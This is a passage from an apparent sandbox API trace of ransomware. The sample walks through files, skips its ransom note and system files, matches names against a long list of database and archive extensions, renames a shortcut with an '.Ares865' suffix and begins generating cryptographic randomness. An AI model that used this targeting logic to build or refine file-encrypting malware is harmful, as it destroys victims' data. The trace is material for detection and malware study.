ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d98300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.557] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.557] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6392a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer (No Add-ons).lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="aoldtz.exe") returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".") returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="..") returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="windows") returned -1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="bootmgr") returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="temp") returned -1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="pagefile.sys") returned -1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="boot") returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ids.txt") returned 1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat") returned -1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="perflogs") returned -1 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="MSBuild") returned -1 [0058.557] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0058.557] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini") returned 78 [0058.557] lstrcpyW (in: lpString1=0x2cce486, lpString2="Internet Explorer (No Add-ons).lnk" | out: lpString1="Internet Explorer (No Add-ons).lnk") returned="Internet Explorer (No Add-ons).lnk" [0058.557] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0058.557] lstrlenW (lpString="Ares865") returned 7 [0058.557] lstrcmpiW (lpString1="ns).lnk", lpString2="Ares865") returned 1 [0058.557] lstrlenW (lpString=".dll") returned 4 [0058.557] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".dll") returned 1 [0058.557] lstrlenW (lpString=".lnk") returned 4 [0058.558] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".lnk") returned 1 [0058.558] lstrlenW (lpString=".ini") returned 4 [0058.558] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".ini") returned 1 [0058.558] lstrlenW (lpString=".sys") returned 4 [0058.558] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".sys") returned 1 [0058.558] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0058.558] lstrlenW (lpString="bak") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.558] lstrlenW (lpString="ba_") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.558] lstrlenW (lpString="dbb") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.558] lstrlenW (lpString="vmdk") returned 4 [0058.558] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.558] lstrlenW (lpString="rar") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.558] lstrlenW (lpString="zip") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.558] lstrlenW (lpString="tgz") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.558] lstrlenW (lpString="vbox") returned 4 [0058.558] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.558] lstrlenW (lpString="vdi") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.558] lstrlenW (lpString="vhd") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.558] lstrlenW (lpString="vhdx") returned 4 [0058.558] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.558] lstrlenW (lpString="avhd") returned 4 [0058.558] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.558] lstrlenW (lpString="db") returned 2 [0058.558] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.558] lstrlenW (lpString="db2") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.558] lstrlenW (lpString="db3") returned 3 [0058.558] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.558] lstrlenW (lpString="dbf") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.559] lstrlenW (lpString="mdf") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.559] lstrlenW (lpString="mdb") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.559] lstrlenW (lpString="sql") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.559] lstrlenW (lpString="sqlite") returned 6 [0058.559] lstrcmpiW (lpString1="s).lnk", lpString2="sqlite") returned -1 [0058.559] lstrlenW (lpString="sqlite3") returned 7 [0058.559] lstrcmpiW (lpString1="ns).lnk", lpString2="sqlite3") returned -1 [0058.559] lstrlenW (lpString="sqlitedb") returned 8 [0058.559] lstrcmpiW (lpString1="ons).lnk", lpString2="sqlitedb") returned -1 [0058.559] lstrlenW (lpString="xml") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.559] lstrlenW (lpString="$er") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.559] lstrlenW (lpString="4dd") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.559] lstrlenW (lpString="4dl") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.559] lstrlenW (lpString="^^^") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.559] lstrlenW (lpString="abs") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.559] lstrlenW (lpString="abx") returned 3 [0058.559] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.559] lstrlenW (lpString="accdb") returned 5 [0058.559] lstrcmpiW (lpString1=").lnk", lpString2="accdb") returned -1 [0058.559] lstrlenW (lpString="accdc") returned 5 [0058.559] lstrcmpiW (lpString1=").lnk", lpString2="accdc") returned -1 [0058.559] lstrlenW (lpString="accde") returned 5 [0058.559] lstrcmpiW (lpString1=").lnk", lpString2="accde") returned -1 [0058.559] lstrlenW (lpString="accdr") returned 5 [0058.559] lstrcmpiW (lpString1=").lnk", lpString2="accdr") returned -1 [0058.559] lstrlenW (lpString="accdt") returned 5 [0058.559] lstrcmpiW (lpString1=").lnk", lpString2="accdt") returned -1 [0058.559] lstrlenW (lpString="accdw") returned 5 [0058.560] lstrcmpiW (lpString1=").lnk", lpString2="accdw") returned -1 [0058.560] lstrlenW (lpString="accft") returned 5 [0058.560] lstrcmpiW (lpString1=").lnk", lpString2="accft") returned -1 [0058.560] lstrlenW (lpString="adb") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.560] lstrlenW (lpString="adb") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.560] lstrlenW (lpString="ade") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.560] lstrlenW (lpString="adf") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.560] lstrlenW (lpString="adn") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.560] lstrlenW (lpString="adp") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.560] lstrlenW (lpString="alf") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.560] lstrlenW (lpString="ask") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.560] lstrlenW (lpString="btr") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.560] lstrlenW (lpString="cat") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.560] lstrlenW (lpString="cdb") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.560] lstrlenW (lpString="ckp") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.560] lstrlenW (lpString="cma") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.560] lstrlenW (lpString="cpd") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.560] lstrlenW (lpString="dacpac") returned 6 [0058.560] lstrcmpiW (lpString1="s).lnk", lpString2="dacpac") returned 1 [0058.560] lstrlenW (lpString="dad") returned 3 [0058.560] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.560] lstrlenW (lpString="dadiagrams") returned 10 [0058.560] lstrcmpiW (lpString1="d-ons).lnk", lpString2="dadiagrams") returned 1 [0058.561] lstrlenW (lpString="daschema") returned 8 [0058.561] lstrcmpiW (lpString1="ons).lnk", lpString2="daschema") returned 1 [0058.561] lstrlenW (lpString="db-journal") returned 10 [0058.561] lstrcmpiW (lpString1="d-ons).lnk", lpString2="db-journal") returned 1 [0058.561] lstrlenW (lpString="db-shm") returned 6 [0058.561] lstrcmpiW (lpString1="s).lnk", lpString2="db-shm") returned 1 [0058.561] lstrlenW (lpString="db-wal") returned 6 [0058.561] lstrcmpiW (lpString1="s).lnk", lpString2="db-wal") returned 1 [0058.561] lstrlenW (lpString="dbc") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.561] lstrlenW (lpString="dbs") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.561] lstrlenW (lpString="dbt") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.561] lstrlenW (lpString="dbv") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.561] lstrlenW (lpString="dbx") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.561] lstrlenW (lpString="dcb") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.561] lstrlenW (lpString="dct") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.561] lstrlenW (lpString="dcx") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.561] lstrlenW (lpString="ddl") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.561] lstrlenW (lpString="dlis") returned 4 [0058.561] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.561] lstrlenW (lpString="dp1") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.561] lstrlenW (lpString="dqy") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.561] lstrlenW (lpString="dsk") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.561] lstrlenW (lpString="dsn") returned 3 [0058.561] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.561] lstrlenW (lpString="dtsx") returned 4 [0058.561] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.561] lstrlenW (lpString="dxl") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.562] lstrlenW (lpString="eco") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.562] lstrlenW (lpString="ecx") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.562] lstrlenW (lpString="edb") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.562] lstrlenW (lpString="epim") returned 4 [0058.562] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.562] lstrlenW (lpString="fcd") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.562] lstrlenW (lpString="fdb") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.562] lstrlenW (lpString="fic") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.562] lstrlenW (lpString="flexolibrary") returned 12 [0058.562] lstrcmpiW (lpString1="Add-ons).lnk", lpString2="flexolibrary") returned -1 [0058.562] lstrlenW (lpString="fm5") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.562] lstrlenW (lpString="fmp") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.562] lstrlenW (lpString="fmp12") returned 5 [0058.562] lstrcmpiW (lpString1=").lnk", lpString2="fmp12") returned -1 [0058.562] lstrlenW (lpString="fmpsl") returned 5 [0058.562] lstrcmpiW (lpString1=").lnk", lpString2="fmpsl") returned -1 [0058.562] lstrlenW (lpString="fol") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.562] lstrlenW (lpString="fp3") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.562] lstrlenW (lpString="fp4") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.562] lstrlenW (lpString="fp5") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.562] lstrlenW (lpString="fp7") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.562] lstrlenW (lpString="fpt") returned 3 [0058.562] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.563] lstrlenW (lpString="frm") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.563] lstrlenW (lpString="gdb") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.563] lstrlenW (lpString="gdb") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.563] lstrlenW (lpString="grdb") returned 4 [0058.563] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.563] lstrlenW (lpString="gwi") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.563] lstrlenW (lpString="hdb") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.563] lstrlenW (lpString="his") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.563] lstrlenW (lpString="ib") returned 2 [0058.563] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.563] lstrlenW (lpString="idb") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.563] lstrlenW (lpString="ihx") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.563] lstrlenW (lpString="itdb") returned 4 [0058.563] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.563] lstrlenW (lpString="itw") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.563] lstrlenW (lpString="jet") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.563] lstrlenW (lpString="jtx") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.563] lstrlenW (lpString="kdb") returned 3 [0058.563] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.563] lstrlenW (lpString="kexi") returned 4 [0058.563] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.563] lstrlenW (lpString="kexic") returned 5 [0058.563] lstrcmpiW (lpString1=").lnk", lpString2="kexic") returned -1 [0058.563] lstrlenW (lpString="kexis") returned 5 [0058.563] lstrcmpiW (lpString1=").lnk", lpString2="kexis") returned -1 [0058.563] lstrlenW (lpString="lgc") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.564] lstrlenW (lpString="lwx") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.564] lstrlenW (lpString="maf") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.564] lstrlenW (lpString="maq") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.564] lstrlenW (lpString="mar") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.564] lstrlenW (lpString="marshal") returned 7 [0058.564] lstrcmpiW (lpString1="ns).lnk", lpString2="marshal") returned 1 [0058.564] lstrlenW (lpString="mas") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.564] lstrlenW (lpString="mav") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.564] lstrlenW (lpString="maw") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.564] lstrlenW (lpString="mdbhtml") returned 7 [0058.564] lstrcmpiW (lpString1="ns).lnk", lpString2="mdbhtml") returned 1 [0058.564] lstrlenW (lpString="mdn") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.564] lstrlenW (lpString="mdt") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.564] lstrlenW (lpString="mfd") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.564] lstrlenW (lpString="mpd") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.564] lstrlenW (lpString="mrg") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.564] lstrlenW (lpString="mud") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.564] lstrlenW (lpString="mwb") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.564] lstrlenW (lpString="myd") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.564] lstrlenW (lpString="ndf") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.564] lstrlenW (lpString="nnt") returned 3 [0058.564] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.565] lstrlenW (lpString="nrmlib") returned 6 [0058.565] lstrcmpiW (lpString1="s).lnk", lpString2="nrmlib") returned 1 [0058.565] lstrlenW (lpString="ns2") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.565] lstrlenW (lpString="ns3") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.565] lstrlenW (lpString="ns4") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.565] lstrlenW (lpString="nsf") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.565] lstrlenW (lpString="nv") returned 2 [0058.565] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.565] lstrlenW (lpString="nv2") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.565] lstrlenW (lpString="nwdb") returned 4 [0058.565] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.565] lstrlenW (lpString="nyf") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.565] lstrlenW (lpString="odb") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.565] lstrlenW (lpString="odb") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.565] lstrlenW (lpString="oqy") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.565] lstrlenW (lpString="ora") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.565] lstrlenW (lpString="orx") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.565] lstrlenW (lpString="owc") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.565] lstrlenW (lpString="p96") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.565] lstrlenW (lpString="p97") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.565] lstrlenW (lpString="pan") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.565] lstrlenW (lpString="pdb") returned 3 [0058.565] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.565] lstrlenW (lpString="pdm") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.566] lstrlenW (lpString="pnz") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.566] lstrlenW (lpString="qry") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.566] lstrlenW (lpString="qvd") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.566] lstrlenW (lpString="rbf") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.566] lstrlenW (lpString="rctd") returned 4 [0058.566] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.566] lstrlenW (lpString="rod") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.566] lstrlenW (lpString="rodx") returned 4 [0058.566] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.566] lstrlenW (lpString="rpd") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.566] lstrlenW (lpString="rsd") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.566] lstrlenW (lpString="sas7bdat") returned 8 [0058.566] lstrcmpiW (lpString1="ons).lnk", lpString2="sas7bdat") returned -1 [0058.566] lstrlenW (lpString="sbf") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.566] lstrlenW (lpString="scx") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.566] lstrlenW (lpString="sdb") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.566] lstrlenW (lpString="sdc") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.566] lstrlenW (lpString="sdf") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.566] lstrlenW (lpString="sis") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.566] lstrlenW (lpString="spq") returned 3 [0058.566] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.566] lstrlenW (lpString="te") returned 2 [0058.567] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.567] lstrlenW (lpString="teacher") returned 7 [0058.567] lstrcmpiW (lpString1="ns).lnk", lpString2="teacher") returned -1 [0058.567] lstrlenW (lpString="tmd") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.567] lstrlenW (lpString="tps") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.567] lstrlenW (lpString="trc") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.567] lstrlenW (lpString="trc") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.567] lstrlenW (lpString="trm") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.567] lstrlenW (lpString="udb") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.567] lstrlenW (lpString="udl") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.567] lstrlenW (lpString="usr") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.567] lstrlenW (lpString="v12") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.567] lstrlenW (lpString="vis") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.567] lstrlenW (lpString="vpd") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.567] lstrlenW (lpString="vvv") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.567] lstrlenW (lpString="wdb") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.567] lstrlenW (lpString="wmdb") returned 4 [0058.567] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.567] lstrlenW (lpString="wrk") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.567] lstrlenW (lpString="xdb") returned 3 [0058.567] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.567] lstrlenW (lpString="xld") returned 3 [0058.568] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.568] lstrlenW (lpString="xmlff") returned 5 [0058.568] lstrcmpiW (lpString1=").lnk", lpString2="xmlff") returned -1 [0058.568] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.Ares865") returned 109 [0058.568] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.ares865"), dwFlags=0x1) returned 1 [0058.568] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.568] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1499) returned 1 [0058.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.569] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.570] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.570] CryptReleaseContext (hProv=0x2f0518, 